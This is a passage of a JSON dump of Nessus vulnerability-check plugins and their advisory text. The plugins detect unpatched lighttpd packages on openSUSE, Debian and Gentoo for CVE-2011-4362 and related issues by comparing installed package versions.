"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl"], "id": "SUSE_11_4_LIGHTTPD-120130.NASL", "href": "https://www.tenable.com/plugins/nessus/75941", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive 
text and package checks in this plugin were\n# extracted from openSUSE Security Update lighttpd-5735.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75941);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"openSUSE Security Update : lighttpd (openSUSE-SU-2012:0240-1)\");\n script_summary(english:\"Check for the lighttpd-5735 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of lighttpd fixes an out-of-bounds read due to a\nsignedness error which could cause a Denial of Service\n(CVE-2011-4362). Additionally an option was added to honor the server\ncipher order (resolves lighttpd#2364).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=733607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2012-02/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-debugsource-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_cml-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_cml-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_magnet-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_mysql_vhost-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_rrdtool-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", 
reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_webdav-1.4.26-6.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.26-6.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-mod_cml / lighttpd-mod_magnet / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T12:24:18", "description": " - added lighttpd-1.4.30_head_fixes.patch: cherry picked 4\n fixes from HEAD :\n\n - [ssl] include more headers explicitly\n\n - list all network handlers in lighttpd -V (fixes\n lighttpd#2376)\n\n - Move fdevent subsystem includes to implementation files\n to reduce conflicts (fixes lighttpd#2373)\n\n - [ssl] fix segfault in counting renegotiations for\n openssl versions without TLSEXT/SNI\n\n - update to 1.4.30: (bnc#733607)\n\n - Always use our ‘own’ md5 implementation,\n fixes linking issues on MacOS (fixes #2331)\n\n - Limit amount of bytes we send in one go; fixes stalling\n in one connection and timeouts on slow systems.\n\n - [ssl] fix build errors when Elliptic-Curve\n Diffie-Hellman is disabled\n\n - Add static-file.disable-pathinfo option to prevent\n handling of urls like …/secret.php/image.jpg as\n static file\n\n - Don’t overwrite 401 (auth required) with 501\n (unknown method) (fixes #2341)\n\n - Fix mod_status bug: always showed “0/0” in\n the “Read” column for uploads (fixes #2351)\n\n - [mod_auth] Fix signedness error in 
http_auth (fixes\n #2370, CVE-2011-4362)\n\n - [ssl] count renegotiations to prevent client\n renegotiations\n\n - [ssl] add option to honor server cipher order (fixes\n #2364, BEAST attack)\n\n - [core] accept dots in ipv6 addresses in host header\n (fixes #2359)\n\n - [ssl] fix ssl connection aborts if files are larger than\n the MAX_WRITE_LIMIT (256kb)\n\n - [libev/cgi] fix waitpid ECHILD errors in cgi with libev\n (fixes #2324)\n\n - add automake as buildrequire to avoid implicit\n dependency", "edition": 17, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : lighttpd (openSUSE-2012-110)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:lighttpd-mod_geoip-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_geoip", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool", "p-cpe:/a:novell:opensuse:lighttpd", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-debugsource", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl"], "id": "OPENSUSE-2012-110.NASL", "href": "https://www.tenable.com/plugins/nessus/74546", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-110.\n#\n# The text description of this 
plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74546);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"openSUSE Security Update : lighttpd (openSUSE-2012-110)\");\n script_summary(english:\"Check for the openSUSE-2012-110 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - added lighttpd-1.4.30_head_fixes.patch: cherry picked 4\n fixes from HEAD :\n\n - [ssl] include more headers explicitly\n\n - list all network handlers in lighttpd -V (fixes\n lighttpd#2376)\n\n - Move fdevent subsystem includes to implementation files\n to reduce conflicts (fixes lighttpd#2373)\n\n - [ssl] fix segfault in counting renegotiations for\n openssl versions without TLSEXT/SNI\n\n - update to 1.4.30: (bnc#733607)\n\n - Always use our ‘own’ md5 implementation,\n fixes linking issues on MacOS (fixes #2331)\n\n - Limit amount of bytes we send in one go; fixes stalling\n in one connection and timeouts on slow systems.\n\n - [ssl] fix build errors when Elliptic-Curve\n Diffie-Hellman is disabled\n\n - Add static-file.disable-pathinfo option to prevent\n handling of urls like …/secret.php/image.jpg as\n static file\n\n - Don’t overwrite 401 (auth required) with 501\n (unknown method) (fixes #2341)\n\n - Fix mod_status bug: always showed “0/0” in\n the “Read” column for uploads (fixes #2351)\n\n - [mod_auth] Fix signedness error in http_auth (fixes\n #2370, CVE-2011-4362)\n\n - [ssl] count renegotiations to prevent client\n renegotiations\n\n - [ssl] add option to honor server cipher order (fixes\n #2364, BEAST attack)\n\n - [core] accept dots in ipv6 addresses in host header\n (fixes #2359)\n\n - [ssl] fix ssl connection aborts if files 
are larger than\n the MAX_WRITE_LIMIT (256kb)\n\n - [libev/cgi] fix waitpid ECHILD errors in cgi with libev\n (fixes #2324)\n\n - add automake as buildrequire to avoid implicit\n dependency\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=733607\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_geoip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_geoip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-debugsource-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", 
reference:\"lighttpd-mod_cml-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_cml-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_geoip-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_geoip-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_magnet-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_mysql_vhost-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_rrdtool-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_webdav-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.30-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-debuginfo / lighttpd-debugsource / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-12T09:47:09", "description": "Several vulnerabilities have been discovered in lighttpd, a small and\nfast webserver with minimal memory footprint.\n\n - CVE-2011-4362\n Xi 
Wang discovered that the base64 decoding routine\n which is used to decode user input during an HTTP\n authentication, suffers of a signedness issue when\n processing user input. As a result it is possible to\n force lighttpd to perform an out-of-bounds read which\n results in Denial of Service conditions.\n\n - CVE-2011-3389\n When using CBC ciphers on an SSL enabled virtual host to\n communicate with certain client, a so called 'BEAST'\n attack allows man-in-the-middle attackers to obtain\n plaintext HTTP traffic via a blockwise chosen-boundary\n attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a\n workaround to mitigate this problem by providing a\n possibility to disable CBC ciphers.\n\n This updates includes this option by default. System administrators\n are advised to read the NEWS file of this update (as this may break\n older clients).", "edition": 17, "published": "2012-01-12T00:00:00", "title": "Debian DSA-2368-1 : lighttpd - multiple vulnerabilities (BEAST)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3389", "CVE-2011-4362"], "modified": "2012-01-12T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:lighttpd", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-2368.NASL", "href": "https://www.tenable.com/plugins/nessus/57508", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2368. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57508);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-3389\", \"CVE-2011-4362\");\n script_bugtraq_id(49778, 50851);\n script_xref(name:\"DSA\", value:\"2368\");\n\n script_name(english:\"Debian DSA-2368-1 : lighttpd - multiple vulnerabilities (BEAST)\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in lighttpd, a small and\nfast webserver with minimal memory footprint.\n\n - CVE-2011-4362\n Xi Wang discovered that the base64 decoding routine\n which is used to decode user input during an HTTP\n authentication, suffers of a signedness issue when\n processing user input. As a result it is possible to\n force lighttpd to perform an out-of-bounds read which\n results in Denial of Service conditions.\n\n - CVE-2011-3389\n When using CBC ciphers on an SSL enabled virtual host to\n communicate with certain client, a so called 'BEAST'\n attack allows man-in-the-middle attackers to obtain\n plaintext HTTP traffic via a blockwise chosen-boundary\n attack (BCBA) on an HTTPS session. Technically this is\n no lighttpd vulnerability. However, lighttpd offers a\n workaround to mitigate this problem by providing a\n possibility to disable CBC ciphers.\n\n This updates includes this option by default. 
System administrators\n are advised to read the NEWS file of this update (as this may break\n older clients).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=652726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-3389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/lighttpd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2368\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the lighttpd packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.4.19-5+lenny3.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.4.28-2+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script 
is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"lighttpd\", reference:\"1.4.19-5+lenny3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-doc\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-cml\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-magnet\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-mysql-vhost\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-trigger-b4-dl\", reference:\"1.4.28-2+squeeze1\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lighttpd-mod-webdav\", reference:\"1.4.28-2+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T10:55:49", "description": "The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Furthermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 21, "published": "2014-06-16T00:00:00", "title": "GLSA-201406-10 : lighttpd: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-4508", "CVE-2014-2323", "CVE-2012-5533", "CVE-2013-4560", "CVE-2013-4559", "CVE-2011-4362"], "modified": "2014-06-16T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:lighttpd"], "id": "GENTOO_GLSA-201406-10.NASL", "href": "https://www.tenable.com/plugins/nessus/76062", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201406-10.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76062);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-4362\", \"CVE-2012-5533\", \"CVE-2013-4508\", \"CVE-2013-4559\", \"CVE-2013-4560\", \"CVE-2014-2323\");\n script_bugtraq_id(50851, 56619, 63534, 63686, 63688, 66153);\n script_xref(name:\"GLSA\", value:\"201406-10\");\n\n script_name(english:\"GLSA-201406-10 : lighttpd: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201406-10\n(lighttpd: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in lighttpd. 
Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could create a Denial of Service condition.\n Futhermore, a remote attacker may be able to execute arbitrary SQL\n statements.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201406-10\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All lighttpd users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/lighttpd-1.4.35'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/13\");\n 